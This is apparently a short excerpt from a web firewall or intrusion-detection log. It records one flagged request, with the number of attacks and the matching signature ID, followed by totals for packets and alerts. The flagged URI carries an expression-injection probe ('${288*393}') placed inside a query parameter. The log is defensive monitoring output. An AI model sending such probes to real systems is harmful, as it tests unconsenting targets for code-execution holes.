Packet [511]	Uri [/web?v4cre$%7b288*393%7dkul5l=1]	Nattacks [1 ]	Signatures	[932130]
# N. packets [565], [316] with alerts, N. Alerts [2512]
